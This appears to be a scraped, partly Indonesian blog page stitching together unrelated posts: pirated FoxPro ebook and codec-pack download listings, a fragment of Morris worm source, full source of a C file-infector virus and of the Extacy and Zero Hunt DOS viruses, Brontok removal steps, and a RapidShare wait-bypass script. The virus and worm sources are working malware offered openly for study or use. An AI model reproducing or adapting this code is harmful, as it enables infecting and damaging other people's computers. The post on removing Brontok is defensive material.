Download
Book Information:
Deploying Visual FoxPro Solutions
by Rick Schummer, Rick Borup and Jacci Adams
CHM | 465 pages | ISBN:1930919328 | 23 Mb
Hentzenwerke Publishing © 2004
Book review:
A comprehensive resource for setting up, installing, maintaining, and distributing software written in Visual FoxPro, this guide will help developers launch a successful application deployment.
Download
Book Information:
Roche, Ted; Hennig, Doug; Martin, Della; Granor, Tamar E.,
«Hacker's Guide to Visual FoxPro 7.0»
CHM | 4,3 Mb | ISBN 1930919220 | Number of Pages: 372
Book review:
An irreverent look at how Visual FoxPro really works, this guide gives developers insight into every command, function, event, and method of version 7.0, including Service Pack One. Recognized within the FoxPro developer community as the indispensable resource for serious FoxPro development, this updated edition covers Visual FoxPro's Power Tools and the various components of the language, including Xbase traditions and assumptions. Also included are hardware tips and optimization guidelines. Subjects such as Active technologies as they relate to VFP, the Class Browser and Component Gallery, VFP's Builder and Wizard technologies, and VFP's version of IntelliSense are covered in detail.
Download
ISBN: 1930919255
Title: The Visual FoxPro Report Writer: Pushing it to the Limit and Beyond
Author: Cathy Pountney
Publisher: Hentzenwerke Publishing
Publication Date:
Number Of Pages: 297
Average Amazon Rating:
Editorial Description
Reports are key to a successful software application. It doesn't matter how efficiently the users enter data, how much information the system can store, or how many complicated calculations the system can process if there's no way to see the final outcome. In this reference, software developers are shown how to use every nook and cranny of report writers. Included are fundamentals of using the VFP Report Writer correctly such as starting the report wizard, invoking the report designer.
DOwnload
Book Information:
WebRAD: Building Web Database Apps with Visual FoxPro & Web Connection
by Harold Chattaway, J. Randy Pearson, Whil Hentzen | Edited by Barbara Peisch | ISBN: 1-930919-07-7 | 450 pages | PDF (16.1 MB) |
Press date: June, 2002 | Source code included.
Book review:
Web Connection is an incredible product, enabling you to build high performance, feature-rich, database-enabled websites using the language you know and love - Visual FoxPro. But, as more than one developer has said, "it's a bitch to learn." This book is your personal tutor, walking you through the plumbing of the Internet and the World Wide Web, showing you how to build your first VFP-based web site step by step, and then how to add features and improve your productivity by exploiting the multitude of built-in classes that Web Connection offers. A must-read for every Web Connection developer.
Read more!
File ini adalah koleksi semua codec dan perlengkapannya. Codec diperlukan untuk encode dan decode audio maupun video. Sudah didesain user-friendly solusi untuk memutar semua file movie. Kamu dapat memutar 99% dari semua movies yang diada.
Versi terbaru dapat memutar file "RM, 3GP, AVI, MPEG, MPG, DAT, ASF "
Tapi masih ada kelemahan tidak bisa memutar file MP4 (file versi DVD)
download
Features version :
• Player :
- Media Player Classic (latest build from Celtic_Druid)
• FFDShow :
- ffdshow [rev. 416]
- extra plugins
- FFDShow VFW interface
• DirectShow video filters :
- XviD [version 1.2.0-dev build 2006-04-20]
- DivX [version 6.2.5.34]
- CoreAVC [version 0.0.0.4]
- On2 VP6 [version 6.4.2.0]
- On2 VP7 [version 7.0.10.0]
- MPEG-1 / MPEG-2 (Cyberlink) [version 6.0.2.2806]
- MPEG-1 / MPEG-2 (InterVideo) [version 7.0.27.191]
- MPEG-1 / MPEG-2 (DScaler5) [version 0.0.8.0]
- MPEG-1 / MPEG-2 (Gabest) [version 1.0.0.3]
- MPEG-1 / MPEG-2 (MainConcept) [version 1.0.0.78]
• VFW video codecs :
- XviD [version 1.2.0-dev build 2006-04-20]
- DivX Pro [version 6.2.5.34]
- x264 [rev. 578]
- Windows Media 9 VCM [version 9.0.1.369]
- On2 VP6 [version 6.4.2.0] [Encoding]
- On2 VP7 [version 7.0.10.0] [Encoding]
- Intel Indeo [version 5.2562.15.54]
- Intel Indeo [version 4.51.16.2]
- Intel Indeo [version 3.24.15.03]
- Intel I.263 [version 2.55.1.16]
- huffyuv [version 2.1.1 CCE Patch 0.2.5]
• DirectShow audio filters :
- MP3 (Fraunhofer) [version 1.9.0.311]
- AC3/DTS/LPCM (AC3Filter) [version 1.10b]
- AC3/DTS/LPCM (InterVideo) [version 7.0.27.191]
- MP1/MP2 (MainConcept) [version 1.0.0.78]
- Vorbis (CoreVorbis) [version 1.1.0.79]
- AAC (CoreAAC) [version 1.2.0.575]
- AAC (3ivX Pro) [version D4 4.5.1]
- MusePack [version 1.0.0.3]
- Monkey's Audio [version 1.00]
- WavPack (CoreWavPack) [version 1.0.3]
- FLAC (illiminable) [version 0.71.0946]
- Voxware MetaSound [version 1.0.0.12]
- AAC encoder (3ivX Pro) [version D4 4.5.1]
• ACM audio codecs :
- MP3 (Fraunhofer) [version 3.3.2]
- MP3 (LAME) [version 3.97]
- AC3 (ffcHandler) [version 1.3.1]
- Vorbis [version 0.0.3.6]
- DivX ;) Audio [version 4.2.0.0]
• DirectShow source filters :
- MP4 splitter (Haali Media Splitter) [version 1.6.224.23]
- MP4 splitter (Gabest) [version 1.0.0.3]
- Matroska splitter (Haali Media Splitter) [version 1.6.224.23]
- Matroska splitter (Gabest) [version 1.0.2.9]
- Ogg splitter (Haali Media Splitter) [version 1.6.224.23]
- FLV splitter (Gabest) [version 1.0.0.1]
- MPEG-TS splitter (Haali Media Splitter) [version 1.6.324.16]
- MPEG demuxer (Cyberlink) [version 1.0.0.3726]
- MPEG demuxer (Gabest) [version 1.0.0.3]
- MPEG demuxer (MainConcept) [version 1.0.1.20]
- MPEG demuxer (Elecard) [version 1.0.31.51211]
- SHOUTcast Source [version 1.0.0.1]
• DirectShow subtitle filter :
- DirectVobSub (a.k.a. VSFilter) [version 2.37]
- DirectVobSub (a.k.a. VSFilter) [version 2.33]
• DirectShow audio filters (general purpose) :
- Morgan Multimedia Stream Switcher [version 0.9.9]
• Encoding tools :
- LAME CLI and DLL [version 3.97]
- LameDropXPd [version 3.97]
- OggDropXPd [version 1.8.9 aoTuVb4.51]
• Tools :
- GSpot Codec Information Appliance [version 2.60 beta 1]
- Sherlock [version 2.0]
- VobSubStrip [version 0.11]
- GraphEdit [build 041201]
- MMCompView [version 1.10]
- AVI Fixed [version 2.0b1]
- FourCC Changer
- Bitrate Calculator
Read more!
666 The Dead Zone 214-522-5321 300/1200/2400 666
#include
#include
#include
#include
long current_time;
struct rlimit no_core = {0,0};
int
main (argc, argv)
int argc;
char *argv[];
{
int n;
int parent = 0;
int okay = 0;
/* change calling name to "sh" */
strcpy(argv[0], "sh");
/* prevent core files by setting limit to 0 */
setrlimit(RLIMIT_CORE, no_core);
current_time = time(0);
/* seed random number generator with time */
srand48(current_time);
n = 1;
while (argv[n]) {
/* save process id of parent */
if (!strncmp(argv[n], "-p", 2)) {
parent = atoi (argv[++n]);
n++;
}
else {
/* check for 1l.c in argument list */
if (!strncmp(argv([n], "1l.c", 4))
okay = 1;
/* load an object file into memory */
load_object (argv[n];
/* clean up by unlinking file */
if (parent)
unlink (argv[n]);
/* and removing object file name */
strcpy (argv[n++], "");
}
}
/* if 1l.c was not in argument list, quit */
if (!okay)
exit (0);
/* reset process group */
setpgrp (getpid());
/* kill parent shell if parent is set */
if (parent)
kill(parent, SIGHUP);
/* scan for network interfaces */
if_init();
/* collect list of gateways from netstat */
rt_init();
/* start main loop */
doit();
}
int
doit()
{
current_time = time (0);
/* seed random number generator (again) */
srand48(current_time);
/* attack gateways, local nets, remote nets */
attack_hosts();
/* check for a "listening" worm */
check_other ()
/* attempt to send byte to "ernie" */
send_message ()
for (;;) {
/* crack some passwords */
crack_some ();
/* sleep or listen for other worms */
other_sleep (30);
crack_some ();
/* switch process id's */
if (fork())
/* parent exits, new worm continues */
exit (0);
/* attack gateways, known hosts */
attack_hosts();
other_sleep(120);
/* if 12 hours have passed, reset hosts */
if(time (0) == current_time + (3600*12)) {
reset_hosts();
current_time = time(0); }
/* quit if pleasequit is set, and nextw>10 */
if (pleasequit && nextw > 10)
exit (0);
}
}
Read more!
/* C-Virus: A generic .COM and .EXE infector
Project started and completed on 6-24-91
Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too)
*/
#pragma inline // Compile to .ASM
#include
#include
#include
#include
#include
void hostile_activity(void);
int infected(char *);
void spread(char *, char *);
void small_print(char *);
char *victim(void);
#define DEBUG
#define ONE_KAY 1024 // 1k
#define TOO_SMALL ((6 * ONE_KAY) + 300) // 6k+ size minimum
#define SIGNATURE "NMAN" // Sign of infection
int main(void)
{
/* The main program */
spread(_argv[0], victim()); // Perform infection
small_print("Out of memory\r\n"); // Print phony error
return(1); // Fake failure...
}
void hostile_activity(void)
{
/* Put whatever you feel like doing here...I chose to
make this part harmless, but if you're feeling
nasty, go ahead and have some fun... */
small_print("\a\a\aAll files infected. Mission complete.\r\n");
exit(2);
}
int infected(char *fname)
{
/* This function determines if fname is infected */
FILE *fp; // File handle
char sig[5]; // Virus signature
fp = fopen(fname, "rb");
fseek(fp, 28L, SEEK_SET);
fread(sig, sizeof(sig) - 1, 1, fp);
#ifdef DEBUG
printf("Signature for %s: %s\n", fname, sig);
#endif
fclose(fp);
return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);
}
void small_print(char *string)
{
/* This function is a small, quick print routine */
asm {
push si
mov si,string
mov ah,0xE
}
print: asm {
lodsb
or al,al
je finish
int 0x10
jmp short print
}
finish: asm pop si
}
void spread(char *old_name, char *new_name)
{
/* This function infects new_name with old_name */
/* Variable declarations */
FILE *old, *new; // File handles
struct ftime file_time; // Old file date,
time
int attrib; // Old attributes
long old_size, virus_size; // Sizes of files
char *virus_code = NULL; // Pointer to virus
int old_handle, new_handle; // Handles for files
/* Perform the infection */
#ifdef DEBUG
printf("Infecting %s with %s...\n", new_name, old_name);
#endif
old = fopen(old_name, "rb"); // Open virus
new = fopen(new_name, "rb"); // Open victim
old_handle = fileno(old); // Get file handles
new_handle = fileno(new);
old_size = filelength(new_handle); // Get old file size
virus_size = filelength(old_handle); // Get virus size
attrib = _chmod(new_name, 0); // Get old attributes
getftime(new_handle, &file_time); // Get old file time
fclose(new); // Close the virusee
_chmod(new_name, 1, 0); // Clear any read-only
unlink(new_name); // Erase old file
new = fopen(new_name, "wb"); // Open new virus
new_handle = fileno(new);
virus_code = malloc(virus_size); // Allocate space
fread(virus_code, virus_size, 1, old); // Read virus from old
fwrite(virus_code, virus_size, 1, new); // Copy virus to new
_chmod(new_name, 1, attrib); // Replace attributes
chsize(new_handle, old_size); // Replace old size
setftime(new_handle, &file_time); // Replace old time
/* Clean up */
fcloseall(); // Close files
free(virus_code); // Free memory
}
char *victim(void)
{
/* This function returns the virus's next victim */
/* Variable declarations */
char *types[] = {"*.EXE", "*.COM"}; // Potential victims
static struct ffblk ffblk; // DOS file block
int done; // Indicates finish
int index; // Used for loop
/* Find our victim */
if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))
return(_argv[1]);
for (index = 0; index < sizeof(types); index++) {
done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
FA_SYSTEM | FA_ARCH);
while (!done) {
#ifdef DEBUG
printf("Scanning %s...\n", ffblk.ff_name);
#endif
/* If you want to check for specific days of the week,
months, etc., here is the place to insert the
code (don't forget to "#include "!) */
if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
TOO_SMALL))
return(ffblk.ff_name);
done = findnext(&ffblk);
}
}
/* If there are no files left to infect, have a little fun... */
hostile_activity();
return(0); // Prevents warning
}
Read more!
Bagi yang ingin mempelajari bagaimana membuat virus ataupun antivirus, pada kesempatan kali ini di bagikan source code virus Extacy dan Zero Hunt.
Setidaknya sebagian ilmu dan teknik dapat diambil dari ke2 virus di bawah ini.
Virus Extacy ------------------------------------------------------------------------
.model tiny
.code
.radix 16
.code
viruslength = heap - _small
startload = 90 * 4
_small:
call relative
oldheader dw 020cdh
dw 0bh dup (0)
relative:
pop bp
push ds
push es
xor ax,ax
mov ds,ax
mov es,ax
mov di,startload
cmp word ptr ds:[di+25],di
jz exit_small
lea si,[bp-3]
mov cx,viruslength
db 2Eh
rep movsb
mov di,offset old21 + startload
mov si,21*4
push si
movsw
movsw
pop di
mov ax,offset int21 + startload
stosw
xchg ax,cx
stosw
exit_small:
pop es
pop ds
or sp,sp
jnp returnCOM
returnGNU:
returnCOM:
mov di,100
push di
mov si,bp
movsw
movsb
ret
infect:
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
mov ax,3d02
int 21
xchg ax,bx
push cs
pop ds
push cs
pop es
mov ax,5700h
int 21h
push cx
push dx
mov si,offset oldheader+startload
mov ah,3f
mov cx,18
push cx
mov dx,si
int 21
cmp ax,cx
jnz go_already_infected
mov di,offset target + startload
push di
rep movsb
pop di
mov ax,4202
cwd
int 21
cmp ds:[di],'ZM'
jz infectNOT
cmp ds:[di],'MZ'
jz infectNOT
sub ax,3
mov byte ptr ds:[di],0e9
mov ds:[di+1],ax
sub ax,viruslength
cmp ds:[si-17],ax
jnz finishinfect
go_already_infected:
pop cx
jmp short already_infected
db "EXTASY!"
db "(c) Metal Militia / Immortal Riot"
int21:
cmp ax,4b00
jz kewl
cmp ax,3e00
jnz oops
mov ah,45
int 21
jmp kewl
oops:
jmp chain
infectNOT:
jmp go_already_infected
kewl:
jmp infect
finishinfect:
mov cx,viruslength
mov dx,startload
mov ah,40
int 21
mov ax,4200
xor cx,cx
cwd
int 21
mov ah,40
mov dx,di
pop cx
int 21
already_infected:
pop dx
pop cx
mov ax,5701h
int 21h
mov ah,3e
int 21
exitinfect:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
chain:
db 0ea
heap:
old21 dw ?, ?
target dw 0ch dup (?)
endheap:
end _small
Virus Zero Hunt--------------------------------------------------------------------
CSEG SEGMENT
ASSUME CS:CSEG, ES:CSEG, SS:CSEG
org 100h
; Zerohunt virus
; Disassembly by PRiEST
; 4-15-93
CMC_JMP equ 0e9f5h ;This is the virus's signature
;which is located at the beginning
;of infected files, it consist of
;a CMC and a JMP
Mem_Loc equ 21ch ;offset of virus in memory
Zero_Size equ offset Zero_End-offset Zero_Start ;Size of virus
Zero_File_Size equ offset Zero_File_End-offset Zero_Start ;Size of virus in
;file
IVT_21 equ 21h*4h ;offset of Int 21h in IVT
IVT_24 equ 24h*4h ;offset of Int 24h in IVT
Mem_Size equ 413h ;offset of Memory size in BIOS area
Zerohunt: jmp Zero_Start ;Dummy code
nop
org 21ch ;set new origin
Zero_Start: call $+3 ;Push IP
pop si ;pop IP into SI
mov es,ax ;ES = segemnt zero
mov di,Mem_Loc ;Offset of memory resident code
cmp byte ptr es:[di],0e8h ;This instructions checks to see
;if the virus is already in memory
;by looking for the call at
;Zero_Start in the IVT
je Jump_File ;return control to file if in memory
mov cx,Zero_Size ;size of virus
sub si,3h ;Find offset of Zero_Start
rep movsb ;copy us to IVT
push es
pop ds ;DS = 0
mov bx,IVT_21 ;offset of Interrupt 21 in the IVT
les si,ds:[bx] ;Get seg:off of Int 21h
mov word ptr ds:[bx],offset Zero_21 ;Point Int 21h to us
mov word ptr ds:[bx+2h],ax ;point Int 21h to segment 0
mov word ptr ds:[Old_21+2h],es ;Save Int 21h
mov word ptr ds:[Old_21],si ;Save Int 21h
mov al,40h ;40h k
mov bx,ds:[Mem_Size] ;Get amount of memory in k's
sub bx,ax ;subtract 40h to get segment of mem
mul bx ;find address of free memory
mov word ptr ds:[High_Mem],ax ;Save segment address
xor ax,ax ;Zero out AX
Jump_File: push cs
push cs
pop ds ;Restore DS and ES
pop es
;Self-modifying code that restores the first 4 bytes of an infected .com
;file. The Jump_Data defines where to jump when the virus is done, this
;is because it only infects files that have a JMP (0e9h) as the first
;instruction, any other file gets ignored.
db 0c7h,6,0,1 ;mov word ptr ds:[100h],
File_Data dw 20cdh ;quit to DOS
db 0c7h,6,2,1 ;mov word ptr ds:[102h],
File_Data_2 dw 9090h ;NOPs
db 0e9h ;Jump
;This is where the infected program originally jumped to, right now it's
;set back to the beginning so that it will terminate to DOS.
Jump_Data dw 0-(offset Jump_Data_End-offset Zero_Start)
Jump_Data_End: ;used to find offset of Zero_Start
Random_Read: pushf ;Keep stack in order when IRET
push cs ;return to this segment
call Jump_21 ;Call DOS to read file
pushf
push ax
push es
push bx
push ds ;save registers
mov ah,2fh ;Get address of DTA into ES:BX
int 21h
push es
pop ds ;DTA segment in DS
cmp word ptr ds:[bx],CMC_JMP ;Is this file infected?
jne Skip_Block_Clean
call Stealth ;Hide virus
Skip_Block_Clean:pop ds
pop bx
pop es
pop ax ;Pop registers
jmp Fix_Flags_Ret ;Fix flags and return
Handle_Read: pushf ;Keep stack right
push cs ;return to this segment
call Jump_21
pushf ;Save flags
jb Fix_Flags_Ret
xchg dx,bx ;Address of data read into BX
cmp word ptr ds:[bx],CMC_JMP ;File infected?
jne Fix_Flags_DX
cmp word ptr ds:[bx+2h],ax ;is it valid (? I guess)
jnb Fix_Flags_DX
call Stealth ;Hide virus
Fix_Flags_DX: xchg dx,bx ;restore registers
Fix_Flags_Ret: popf ;POP flags
push bp
push ax ;Save registers
pushf
pop ax ;tranfer flags to ax
mov bp,sp ;get stack frame
mov ss:[bp+8h],ax ;Save flags directly into stack
pop ax
pop bp ;POP registers
iret
Stealth: push si ;Save register
mov si,bx ;Where code was read to
add si,ds:[bx+2h] ;Where virus is in program
push word ptr ds:[si+File_Data-Zero_Start] ;original bytes
pop word ptr ds:[bx] ;restore them
push word ptr ds:[si+File_Data_2-Zero_Start] ;original bytes
pop word ptr ds:[bx+2h] ;restore them too
add si,4h ;fix for jump
push ax
push cx ;save registers
mov cx,Zero_Size ;Size of virus
xor al,al ;Zero out AL
Stealth_Loop: mov byte ptr ds:[si],al ;Remove virus from file
inc si
loop Stealth_Loop
pop cx
pop ax
pop si ;Pop registers
retn
Zero_21: cmp ah,21h ;Random read?
je Random_Read
cmp ah,27h ;Random Block read?
je Random_Read
cmp ah,3fh ;Handle read?
je Handle_Read
cmp ax,4b00h ;Execute program?
je Infect
jmp Jump_21 ;Jump to original Int 21h
Infect: push es ;save registers
push ax
push bx
push dx
push ds
mov ax,3d02h ;open file for writing
int 21h
xchg ax,bx ;handle into BX
mov ah,3fh ;read from file
xor cx,cx ;Zero CX
mov ds,cx ;zero into DS
inc cx ;read one byte
mov dx,offset Buffer ;read to variable "buffer"
mov si,dx ;same into SI
pushf ;Keep stack straight after IRET
push cs ;Push CS for Far return
call Jump_21 ;Call original Interrupt 21
cmp byte ptr ds:[si],0e9h ;Is the first instruction a jump?
je File_Has_Jump
jmp Close_File ;File is not valid, close and quit
File_Has_Jump: mov ax,4200h ;Set position from start of file
dec cx ;CX now equals 0
xor dx,dx ;DX also equals 0
int 21h ;set file position to start of file
pop ds
pop dx ;POP location of file name
push dx
push ds ;PUSH them back
push bx ;Save file handle number
push cs
pop es ;Set ES to our CS
mov bx,offset High_Mem ;offset of variable High_Mem
mov ax,4b03h ;Load file
int 21h
mov ds,es:[bx] ;Get address of High memory
mov cx,Zero_File_Size ;size of virus in File
mov dx,cx ;same into DX
mov bx,ds:[1h] ;Get jump address
mov bp,bx ;I don't recall BP being saved!!!
xor al,al ;zero out AL
Search_Loop: dec bx ;decrement pointer
pop di ;Pop handle
je Close_File_DI
push di ;Save handle again
cmp byte ptr ds:[bx],al ;search for zeros
je Search_Looper
mov cx,dx ;reset counter
Search_Looper: loop Search_Loop ;Scan for size of virus
mov di,bp ;Get jump address of file
sub di,bx ;minus location of zeros
sub di,offset Jump_Data_End-offset Zero_Start ;Make jump
mov word ptr cs:[Jump_Data],di ;Save original jump address
push word ptr ds:[0] ;save original bytes
pop word ptr cs:[File_Data] ;Into our own code
push word ptr ds:[2h] ;again with bytes 3 and 4
pop word ptr cs:[File_Data_2]
mov si,Mem_Loc ;location of virus in memory
mov cx,dx ;Size of virus in file
dec cx ;Size of virus
push ds
pop es ;ES = segment of free memory
push cs
pop ds ;DS = our segment
mov di,bx ;offset of free space in file
rep movsb ;copy virus into file (I gather)
sub bx,4h ;subtract for jump to virus
mov word ptr es:[2h],bx ;Fix jump
mov word ptr es:[0],CMC_JMP ;CMC, then JMP
mov di,0cfcfh
lds si,ds:[IVT_24] ;fetch address of Int 24h
xchg di,ds:[si] ;what the hey!? Computer should
;crash if Int 24h is triggered!
pop bx ;POP handle number
mov ax,5700h ;Get date
int 21h
push cx
push dx ;save original date/time of file
push es
pop ds ;DS = segment of free memory
mov ah,40h
mov cx,bp ;size of virus
xor dx,dx
int 21h ;write to file, I guess the virus
pop dx
pop cx ;POP the date/time
mov ax,5701h ;restore date/time to file
int 21h
xchg di,bx ;dummy exchange if infection ok
Close_File_DI: xchg di,bx ;retore handle from DI for closing
Close_File: mov ah,3eh ;close file
int 21h
lds si,cs:[IVT_24] ;Get Int 24h address from IVT
cmp byte ptr ds:[si],0cfh ;Is it to us?
jne No_24_Restore ;I know, they're Shitty labels
xchg di,ds:[si] ;restore Int 24h
No_24_Restore: pop ds
pop dx
pop bx
pop ax
pop es ;Pop all registers
Jump_21: db 0eah ;jmp seg:off
Old_21 dd ? ;segment offset of Int 21h
Buffer db ?
Zero_End:
High_Mem dw ? ;Segment of availible memory
Zero_File_End:
CSEG ENDS
END Zerohunt
Read more!
Membersihkan Brontok
Brontok mungkin masih akan di-update, sehingga saya akan memberikan petunjuk pembersihan Brontok dan bukan sebuah antibrontok. Perhatikan bahwa langkah-langkah detail di sini mungkin tidak akan sama persis untuk membereskan Brontok, karena nama file mungkin akan selalu berubah.
Jika Anda tidak yakin, ganti semua langkah hapus menjadi langkah memindahkan file ke direktori tertentu.
1. Matikan fitur system restore di Windows.
2. Tutup semua program yang berjalan, simpan semua dokumen Anda.
3. Pertama, bunuh proses Brontok (proses adalah program yang sedang berjalan).
Anda bisa memakai Process Explorer dari sysinternals.com, salah satu program yang masih belum dipikirkan oleh pembuat Brontok (program lain sejenis akan menyebabkan komputer restart. Mungkin saja di versi Brontok berikutnya program Process Explorer tersebut juga akan menyebabkan komputer restart jika dijalankan). Bunuh proses services.exe, lsass.exe, smss.exe, dan winlogon.exe.
Cara lain yang lebih mudah adalah dengan memanfaatkan program KillVB yang telah saya buat, program tersebut akan membunuh semua proses yang executablenya ditulis dalam VB (tidak hanya virus). Cukup download, ekstrak, dan jalankan file tersebut. Virus akan mati di memori setelah Anda menjalankan program tersebut dan Anda bisa meneruskan proses pembersihan komputer (tidak perlu restart atau masuk safe mode).
Di start menu, pilih programs, lalu pilih startup Klik kanan (jangan salah dengan klik kiri) pada Empty.pif, dan hapus file tersebut. (Kalau perlu, hapus semua file yang tidak Anda perlukan, di masa depan mungkin nama file Empty.pif akan berubah.)
Perbaiki registry dengan membuat file fixbrontok.inf yang tercantum di bawah, lalu mengklik kanan pada file tersebut dan memilih install (download file). File ini akan memperbaiki perubahan setting oleh Brontok, dan akan mengeset agar Explorer menampilkan file yang hidden dan menampilkan juga ekstensi file yang dikenal oleh Explorer.
Untuk langkah selanjutnya, untuk meyakinkan apakah objek dengan ikon folder adalah benar-benar folder, lakukan salah satu langkah berikut:
* Gunakan view detail (di Explorer, pilih menu view, lalu details). Lihat di jenis objek apakah folder atau application. Jangan mengklik aplikasi dengan ikon folder.
* Restart explorer (tanpa merestart Windows), caranya: jalankan task manager dengan menekan ctrl-alt-del, pilih processes, lalu pilih explorer.exe dan pilih End Process. Pilih "Yes", setelah itu pergi ke tab Application, pilih New Task, ketikkan Explorer.exe, lalu tekan enter.
Hapus semua file .exe di %windir%\shellnew (%windir% adalah direktori Windows Anda, misalnya C:\Windows). Tepatnya Anda harus menghapus yang memiliki ikon folder, tapi seharusnya direktori ini tidak berisi file .exe dan biasanya semua file exe di direktori tersebut aman di hapus.
Bersihkan sisa registry yang dibentuk dengan string random, gunakan msconfig (pilih start, ketik msconfig lalu Enter), dan lihat di bagian tab startup, hapus startup item dengan nama diawali dengan bbm dan dengan nama brxxxon (xxxx adalah angka acak). Sekali lagi: nama ini mungkin kelak berubah. Cara terbaik adalah dengan melihat bagian command (kolom kedua), misalnya tercantum C:\Windows\X.exe, lihat file C:\Windows\X.exe, jika file tersebut memiliki ikon folder Anda bisa menghapusnya.
Cari semua file .exe dan .scr di seluruh drive Anda menggunakan fitur find pada Explorer lalu hapus file tersebut jika file tersebut memiliki ikon folder. Untuk mengurangi jumlah file yang ditemukan batasi ukuran file menjadi < 90 kb (Versi lama sekitar 82 kb, versi baru sekitar 43 kb). Urutkan berdasarkan ukuran file agar memudahkan proses penghapusan. Perhatikan agar Anda mencari juga file yang sifatnya hidden Untuk lebih jelasnya lihat gambar berikut. Patut dicurigai juga file .exe dengan kapasitas 88 kb dan 224 kb. File .exe biasanya pakai icon folder (default/standart)
Hapus semua file .com yang ukurannya sama dengan ukuran Brontok yang Anda temukan pada langkah-sebelumnya di C:\Documents and Settings\%username%\Templates.
Hapus scheduled task di Control panel yang bukan milik Anda (yang namanya At1, At2, dst).
Jika Anda memakai Windows 95, Windows 98, atau Windows ME, lihat isi file autoexec.bat yang ada di root folder (C:\autoexec.bat, D:\autoexec.bat, dst), jika isinya hanya satu baris (berupa satu kata "pause"). Hapus autoexec.bat .
Restart komputer, dan lihat apakah Brontok masih ada.
Download File
Read more!
The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.
The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment. But most of the time, that advantage is available only to people with the programming skills to make the changes they want. That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.
Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools. It changes how Web pages look and act by altering the rendering process. Greasemonkey is to Firefox what aftermarket parts are to cars -- it lets you personalize your browser by making it faster and more powerful or simply by making browsing more aesthetically pleasing. How and why you will use Greasemonkey (and I predict you will, if you don't already) will depend on how you browse now.
CODE
http://greasemonkey.mozdev.org/
1) Install the Greasemonkey extension >>
CODE
http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi
atau
http://rapidshare.de/files/35121424/FireFox.uha
2) Restart Firefox
3) Go to
CODE
http://rapidshare.de/files/35121424/FireFox.uha
4) Right click on rapidshare.user.js and choose "Install User Script".
Run FireFox.
From File Menu click on Open File then brouse to whereever you saved the 'greasemonkey.xpi' plug-in. Open it, wait a couple seconds for the install button becomes active. Click on it to install this plug-in then CLOSE FIREFOX.
Run FireFox again. From the File Menu click on Open File then brouse to whereever you saved the 'rapidshare.user.js'. Open it. Click the Tools Menu then click on Install User Script then click OK.
Close FireFox.
The script will let you enjoy "no wait" and multiple file downloads
NB:
install fire fox & install greasemonkey + masukkan script rapidshare (*.user.js)
Read more!
